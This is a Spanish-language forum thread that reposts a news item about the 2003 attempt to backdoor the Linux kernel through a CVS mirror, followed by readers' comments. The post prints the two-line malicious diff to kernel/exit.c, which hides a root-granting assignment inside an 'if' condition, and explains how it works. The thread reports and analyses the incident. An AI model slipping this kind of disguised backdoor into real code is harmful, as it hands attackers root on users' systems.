Intento de instalacion de puerta trasera en el kernel



  • Noticia sacada de hispasec

    Un análisis rutinario automático del código fuente de la última versióndel kernel Linux (2.6-test) descubre el intento de implantar una puertatrasera en dicho sistema operativo.

    Linux es un sistema operativo Open Source en boga, cuya popularidadcrece día a día.

    La última versión del kernel Linux (2.6 test), aún en desarrollo,experimentó un intento de implantarle una puerta trasera, que permitiríaa un atacante local obtener privilegios de administrador o "root" conla ejecución de una función aparentemente inocua y de uso normal.

    El fichero alterado fue "kernel/exit.c", y constaba de apenas dos líneasde código fuente:

    • –- GOOD 2003-11-05 13:46:44.000000000 -0800
      +++ BAD 2003-11-05 13:46:53.000000000 -0800
      @@ -1111,6 +1111,8 @@
      schedule();
      goto repeat;
      }
    • if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
    • retval = -EINVAL;
      retval = -ECHILD;
      end_wait4:
      current->state = TASK_RUNNING;
      <<<<<

    La puerta trasera, muy inteligente, explota el hecho de que el lenguajede programación C permite asignaciones en lugares insospechados, comodentro de una sentencia "if". El efecto neto de este cambio seríaobtener privilegios de administrador o "root" si se invoca la función"sys_wait4()" con los parámetros apropiados ("__WCLONE" y "__WALL"). Ala vista del cambio, el atacante ha mostrado cierta destreza para lograrque el código no sea patentemente malicioso.

    El cambio se realizó en la réplica CVS que reside en el servidor"kernel.bkbits.net". Dicha réplica se obtiene automáticamente a travésde los fuentes oficiales de Linux, gestionados mediante la herramienta"BitKeeper". La alteración afectó a la réplica, no a los fuentesoriginales.

    Aunque el cambio fue detectado de forma automática por laherramientas de exportación BitKeeper->CVS, el incidente servirá comollamada de atención y para desplegar nuevas tecnologías, como elrequerir una firma digital autorizada para poder realizar cambios en elkernel. Dado que la exportación BitKeeper->CVS se realiza de formadiaria, el fichero alterado se detectó y eliminó en menos de 24 horas.

    Para los usuarios de entornos Linux, el mejor consejo que se puede dares descargar las actualizaciones desde fuentes de confianza y verificar,si existen, sus firmas digitales.

    (la verdad despues de esto y de comprometer 4 servers del proyecto Debian GNU/linux ya nose que más puede pasar.... quiebra de redhat xD, pa mi k esto es obra de los secuaces de M$)

    Un saludo!


  • Veteranos HL

    Es el precio de la popularidad que dirían algunos. Mientras Linux ha sido un sistema minoritario nos encontrábamos con menos historias de este tipo, pero ahora que está creciendo rapidamente la cosa cambia, hay mas gente intentando hacer la puñeta como ocurre en Windows. Seguramente servirá como toque de atención.

    Saludos.



  • Yo he entendido que eso se ha encontrado de un kernel bajado de un mirror no oficial, ¿no? Mientras lo bajemos del ftp oficial… Ellos no tienen ninguna culpa de que no lo bajemos del sitio que toca. Almenos eso he entendido yo, quizás me haya confundido (estoy un poco sobado :D). Salu2

    P.D. No es por ofender, pero podrías poner algun que otro espacio OxygeN, que han salido un montón de palabras juntas :D Supongo que habrá sido obra del copy&paste ;) Salu2 :)



  • Publicado originalmente por Elfo
    **Yo he entendido que eso se ha encontrado de un kernel bajado de un mirror no oficial, ¿no? Mientras lo bajemos del ftp oficial… Ellos no tienen ninguna culpa de que no lo bajemos del sitio que toca. Almenos eso he entendido yo, quizás me haya confundido (estoy un poco sobado :D). Salu2

    P.D. No es por ofender, pero podrías poner algun que otro espacio OxygeN, que han salido un montón de palabras juntas :D Supongo que habrá sido obra del copy&paste ;) Salu2 :)**

    Totalmente de acuerdo, además aunque el proyecto sea open-source y colaboren cientos de programadores, son unos pocos los que mueven los hilos y administran los cambios así que eso hace prácticamente imposible instalar una puerta trasera y cosas similares.



  • Esto de puerta trasera me suena a Matrix 2 el tunel blanco largo con muchas puertas…

    Realmente solo sirven para tener privilegios de root? Que significado se le da a una puerta trasera?

    No lo entiendo.

    Salu2! Chau!


Accede para responder
 

Has perdido la conexión. Reconectando a Hardlimit.